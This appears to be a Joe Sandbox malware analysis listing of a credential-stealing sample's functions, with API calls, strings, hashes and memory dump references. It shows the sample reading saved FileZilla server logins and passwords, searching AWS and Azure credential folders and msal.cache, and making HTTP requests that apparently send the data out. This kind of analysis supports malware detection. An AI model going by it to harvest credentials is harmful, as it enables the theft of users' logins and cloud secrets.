                                        • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                      • strtok_s.MSVCRT ref: 0041047B
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                      • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                        • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                        • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                      • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                      • lstrlenA.KERNEL32(00000000), ref: 00410587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                      • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                      • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                      • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                      • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                      • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                      • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                      • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                      • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                      • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                      • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                      • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                      • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                      • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                      • strtok_s.MSVCRT ref: 004107D9
                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
                                      • memset.MSVCRT ref: 0041083D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 337689325-555421843
                                      • Opcode ID: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                      • Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
                                      • Opcode Fuzzy Hash: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
                                      • Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69
                                      APIs
                                      • lstrlen.KERNEL32(00424EC0), ref: 048C4883
                                      • lstrlen.KERNEL32(00424F70), ref: 048C488E
                                      • lstrlen.KERNEL32(00425038), ref: 048C4899
                                      • lstrlen.KERNEL32(004250F0), ref: 048C48A4
                                      • lstrlen.KERNEL32(00425198), ref: 048C48AF
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 048C48BE
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048C48C5
                                      • lstrlen.KERNEL32(00425240), ref: 048C48D3
                                      • lstrlen.KERNEL32(004252E8), ref: 048C48DE
                                      • lstrlen.KERNEL32(00425390), ref: 048C48E9
                                      • lstrlen.KERNEL32(00425438), ref: 048C48F4
                                      • lstrlen.KERNEL32(004254E0), ref: 048C48FF
                                      • lstrlen.KERNEL32(00425588), ref: 048C4913
                                      • lstrlen.KERNEL32(00425630), ref: 048C491E
                                      • lstrlen.KERNEL32(004256D8), ref: 048C4929
                                      • lstrlen.KERNEL32(00425780), ref: 048C4934
                                      • lstrlen.KERNEL32(00425828), ref: 048C493F
                                      • lstrlen.KERNEL32(004258D0), ref: 048C4968
                                      • lstrlen.KERNEL32(00425978), ref: 048C4973
                                      • lstrlen.KERNEL32(00425A40), ref: 048C497E
                                      • lstrlen.KERNEL32(00425AE8), ref: 048C4989
                                      • lstrlen.KERNEL32(00425B90), ref: 048C4994
                                      • strlen.MSVCRT ref: 048C49A7
                                      • lstrlen.KERNEL32(00425C38), ref: 048C49CF
                                      • lstrlen.KERNEL32(00425CE0), ref: 048C49DA
                                      • lstrlen.KERNEL32(00425D88), ref: 048C49E5
                                      • lstrlen.KERNEL32(00425E30), ref: 048C49F0
                                      • lstrlen.KERNEL32(00425ED8), ref: 048C49FB
                                      • lstrlen.KERNEL32(00425F80), ref: 048C4A0B
                                      • lstrlen.KERNEL32(00426028), ref: 048C4A16
                                      • lstrlen.KERNEL32(004260D0), ref: 048C4A21
                                      • lstrlen.KERNEL32(00426178), ref: 048C4A2C
                                      • lstrlen.KERNEL32(00426220), ref: 048C4A37
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 048C4A53
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID:
                                      • API String ID: 2127927946-0
                                      • Opcode ID: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
                                      • Instruction ID: 905fd873511e16d3288428021d46829978a08571801fd398d5b97a85a5f2082d
                                      • Opcode Fuzzy Hash: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
                                      • Instruction Fuzzy Hash: CE411E79740624ABD7109FE5FC4DADCBF70AB4C711BA08061F90A89150CBF593859B7D
                                      APIs
                                      • GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 048D9E58
                                      • GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 048D9E71
                                      • GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 048D9E89
                                      • GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 048D9EA1
                                      • GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 048D9EBA
                                      • GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 048D9ED2
                                      • GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 048D9EEA
                                      • GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 048D9F03
                                      • GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 048D9F1B
                                      • GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 048D9F33
                                      • GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 048D9F4C
                                      • GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 048D9F64
                                      • GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 048D9F7C
                                      • GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 048D9F95
                                      • GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 048D9FAD
                                      • GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 048D9FC5
                                      • GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 048D9FDE
                                      • GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 048D9FF6
                                      • GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 048DA00E
                                      • GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 048DA027
                                      • GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 048DA03F
                                      • LoadLibraryA.KERNEL32(006D6F50,?,048D6F07), ref: 048DA051
                                      • LoadLibraryA.KERNEL32(006D6B7C,?,048D6F07), ref: 048DA062
                                      • LoadLibraryA.KERNEL32(006D6B04,?,048D6F07), ref: 048DA074
                                      • LoadLibraryA.KERNEL32(006D6BDC,?,048D6F07), ref: 048DA086
                                      • LoadLibraryA.KERNEL32(006D6D28,?,048D6F07), ref: 048DA097
                                      • GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 048DA0B9
                                      • GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 048DA0DA
                                      • GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 048DA0F2
                                      • GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 048DA114
                                      • GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 048DA135
                                      • GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 048DA156
                                      • GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 048DA16D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID:
                                      • API String ID: 2238633743-0
                                      • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                      • Instruction ID: beca0f7c335ab942db32e6602f19c630407590a5e7f04b3e13f62bf04159a62d
                                      • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                      • Instruction Fuzzy Hash: AAA15DB5D0A2549FC344DFA8FC889567BBBA74D301718A61BF909C3674E734A640CF62
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D
                                        • Part of subcall function 048CA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
                                        • Part of subcall function 048CA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
                                        • Part of subcall function 048CA377: LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
                                        • Part of subcall function 048CA377: ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
                                        • Part of subcall function 048CA377: LocalFree.KERNEL32(048C16F6), ref: 048CA447
                                        • Part of subcall function 048CA377: CloseHandle.KERNEL32(000000FF), ref: 048CA451
                                        • Part of subcall function 048D9227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 048D9249
                                      • strtok_s.MSVCRT ref: 048D06E2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 048D0729
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D0730
                                      • StrStrA.SHLWAPI(00000000,00421710), ref: 048D074C
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D075A
                                        • Part of subcall function 048D8CD7: malloc.MSVCRT ref: 048D8CDF
                                        • Part of subcall function 048D8CD7: strncpy.MSVCRT ref: 048D8CFA
                                      • StrStrA.SHLWAPI(00000000,00421718), ref: 048D0796
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D07A4
                                      • StrStrA.SHLWAPI(00000000,00421720), ref: 048D07E0
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D07EE
                                      • StrStrA.SHLWAPI(00000000,00421728), ref: 048D082A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D083C
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D08C9
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D08E1
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D08F9
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D0911
                                      • lstrcat.KERNEL32(?,00421744), ref: 048D0929
                                      • lstrcat.KERNEL32(?,00421758), ref: 048D0938
                                      • lstrcat.KERNEL32(?,00421768), ref: 048D0947
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D095A
                                      • lstrcat.KERNEL32(?,00421770), ref: 048D0969
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D097C
                                      • lstrcat.KERNEL32(?,00421774), ref: 048D098B
                                      • lstrcat.KERNEL32(?,00421778), ref: 048D099A
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D09AD
                                      • lstrcat.KERNEL32(?,00421780), ref: 048D09BC
                                      • lstrcat.KERNEL32(?,00421784), ref: 048D09CB
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D09DE
                                      • lstrcat.KERNEL32(?,00421790), ref: 048D09ED
                                      • lstrcat.KERNEL32(?,00421794), ref: 048D09FC
                                      • strtok_s.MSVCRT ref: 048D0A40
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D0A55
                                      • memset.MSVCRT ref: 048D0AA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                      • String ID:
                                      • API String ID: 3689735781-0
                                      • Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                      • Instruction ID: fb1e8b6c6ee3d0ef60ecc7c13ad9a6c9bb1978c1c2df069452af0646cc4455c0
                                      • Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
                                      • Instruction Fuzzy Hash: B6D15271D02218ABDB08EBF4DD45EEE7739AF54305F504A59E106E6090EFB4BA44CB62
                                      APIs
                                        • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                        • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                        • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                        • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                      • StrCmpCA.SHLWAPI(?,02EB7320), ref: 00405A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02EB7400,00000000,?,02E34B20,00000000,?,00421B4C), ref: 00405EC1
                                      • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                      • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                      • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
                                      • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                      • memcpy.MSVCRT(?), ref: 00405F4E
                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00406000
                                      • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                      • HttpOpenRequestA.WININET(00000000,02EB7280,?,02EB6960,00000000,00000000,00400100,00000000), ref: 00405C48
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00406017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------$S`A$S`A
                                      • API String ID: 1406981993-1449208648
                                      • Opcode ID: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                      • Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
                                      • Opcode Fuzzy Hash: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
                                      • Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59
                                      APIs
                                      • memset.MSVCRT ref: 00414FD7
                                        • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00415000
                                      • lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D
                                        • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                        • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                      • memset.MSVCRT ref: 00415063
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0041508C
                                      • lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9
                                        • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                        • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                        • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                        • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                      • memset.MSVCRT ref: 004150EF
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00415118
                                      • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135
                                        • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                        • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                        • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                        • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                        • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02EB23C0,?,000003E8), ref: 00414C9A
                                        • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                        • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                        • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                        • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                        • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                        • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                      • memset.MSVCRT ref: 0041517B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 4017274736-974132213
                                      • Opcode ID: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                      • Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
                                      • Opcode Fuzzy Hash: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
                                      • Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                        • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                      • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                      • lstrcatA.KERNEL32(?,00000000,02EB22B0,0042156C,02EB22B0,00421568,00000000), ref: 0040D308
                                      • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                      • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                      • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                      • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                      • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                      • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                      • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                      • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                        • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
                                        • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                      • lstrlenA.KERNEL32(?), ref: 0040D42A
                                      • lstrlenA.KERNEL32(?), ref: 0040D439
                                      • memset.MSVCRT ref: 0040D488
                                        • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
